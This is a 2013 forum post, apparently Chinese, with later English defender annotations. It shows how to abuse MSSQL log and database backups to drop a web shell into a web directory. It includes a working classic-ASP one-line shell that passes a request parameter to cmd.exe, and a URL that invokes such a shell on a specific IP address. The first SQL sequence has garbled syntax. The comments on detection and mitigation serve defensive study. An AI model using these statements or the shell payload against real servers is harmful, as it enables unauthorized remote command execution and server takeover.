admin 发表于 2013-2-27 21:41:00

mssql 备份获取shell


-- Transaction-log backup sequence as posted; statements are reproduced exactly and not corrected.
-- Defender's reading: this only works for a login that may ALTER DATABASE, create tables and run
-- BACKUP LOG, and where the SQL Server service account can write into a directory the web server
-- serves and executes scripts from. Removing either condition breaks the technique.
-- Review points: unexpected recovery-model changes, short-lived tables with an image column,
-- and backup history rows (msdb.dbo.backupmediafamily.physical_device_name) whose target
-- is not a normal backup location or carries a script extension.

-- Sets the database to the FULL recovery model (log backups require it).
alter database whoamidataname set RECOVERY FULL
-- Scratch table with one image column, used only to hold the inserted content.
create table cmd (a image)
-- First log backup to a throwaway file; WITH INIT overwrites any backup sets already in it.
backup log whoamidataname to disk = ’c:\whoami’ with init
-- The literal is a placeholder in the post (Chinese for "one-line web shell"), not an actual payload.
insert into cmd (a) value* (‘一句话木马’)
-- Second log backup, written to a file name with a script extension (.asp).
-- A BACKUP target ending in a web-script extension is the clearest indicator in this sequence.
backup log whoamidataname to disk = ’whoami.asp’
-- Removes the scratch table afterwards; the backup file on disk remains.
drop table cmd
-- Full-database variant as posted; the leading '#' markers are part of the original listing.
-- Same preconditions as any BACKUP-to-webroot abuse: a login allowed to run BACKUP DATABASE and a
-- service account with write access to a web-served path. Mitigations: run the application login
-- without db_owner/backup rights, deny the SQL Server service account write access to web
-- directories, and parameterize application queries so stacked statements cannot be injected.

-- Switches context to the model system database.
# use model   
-- Scratch table with one image column.
# create table cmd (str image);   
-- Stores a classic-ASP expression that passes the request parameter "c" to cmd.exe /c through
-- wscript.shell and returns its stdout. Detection: a web worker process spawning cmd.exe,
-- and request logs showing a "c=" query parameter on an unfamiliar .asp file.
# insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');   
-- Backs the database up to a .asp file under what looks like a web root (g:\wwwtest\) — an
-- assumption from the path name. File-integrity monitoring on web directories would flag a large
-- binary file with a script extension.
# backup database model to disk='g:\wwwtest\l.asp';
http://202.119.9.42/l.asp?c=dir